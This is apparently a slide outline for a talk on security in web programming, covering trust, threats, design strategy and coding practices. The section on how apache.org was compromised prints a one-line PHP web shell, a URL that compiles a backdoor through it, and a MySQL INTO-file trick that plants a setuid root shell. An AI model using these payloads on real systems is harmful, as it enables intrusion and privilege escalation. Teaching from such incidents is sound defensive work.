Security and Web Programming/Design

cell phones

bio-facilities

Sodas, junk food, and coffee

Welcome to the No Smoking State

who are you?

where are you from?

what do you do?

Emacs or vi?

Warm Fuzzies

Secure Design and Implementation

Wordage

Security Concepts

Vetting Software

Design Strategy

Developer practices

Coding Practices

Operational Practices

Security Concepts

trust

transitive trust

principle of least privilege

enumerating badness

“best block: not be there”

-- Mr. Miyage

“defense in depth”

threats

vulnerabilities

risks

who accepts the risk?

being paranoid

confidentiality

integrity

availability

protect what you can

detect what you can’t prevent

hammers, nails...

a security mechanism is design to protect against a specific

finite set of attacks.

It usually fails gloriously when modified or used for

other purposes.

don’t design your own new security protocol

the law of unintended consequences

don’t rely on the environment for protection

don’t rely on good behavior

don’t rely on things you can’t control

how apache.org got pwn3d

ftproot == wwwroot

webuser == o+w

upload php via ftp

<? passthru($cmd); ?>

upload backdoor code

compile and execute via http

http://www.apache.org/thatdir/wuh.php3?cmd=gcc+-o+httpd+httpd.c

voila! shell on web server

bugzilla talking to mysql

mysql running as root

mysql username/password stored script

create table with text field

insert:

#!/bin/shcp /bin/sh /tmp/.rootshchmod 4755 /tmp/.rootshrm -f /root/.tcshrc

query: SELECT ... INTO ‘/root/.tchsrc’

wait for someone to “su -”

Security Vetting

What is it supposed to do?

How does it work?

What side effects are there?

How is it deployed and maintained?

How does it fail?

What is the risk?

Can it be mitigated?

usability and security

understanding

caring

under-budget

security is an enabling task

It is especially important for expert programmers to internalize this habit, for two reasons. One is that expert programmers are disproportionately drawn from the high end of the bell curve in their working-set size; therefore they tend to systematically overestimate the amount of complexity other people can handle easily.

-- Eric S. Raymond, The Art of Unix Usability

Design Strategy

top down design

goals

requirements

design

review

what is the end result?

what problem trying to solve?

*not* how it is implemented

security

usability

performance

environmental

support

deployment

political

external

as simple as possible to meet the requirements

add requirements if apparent during design

be prepared to change when requirements can’t be met

for each security control

what threat is addressed?

Really?

recent examples

Developer Practices

The three virtues of a programmer are laziness, impatience, and hubris.

-- Larry Wall

Group permissions and accounts

Code Safety

Test Environment

Regression Testing

Coding Practices

bounds checking

input validation

no client-side trust

error checking

sql injection

cross-site scripting

credential handling

data mapping

logging

don’t require shell for remote execution

Operational Practices

Server accounts and permissions

handling credentials

accountability

software maintenance

documentation

testing and debugging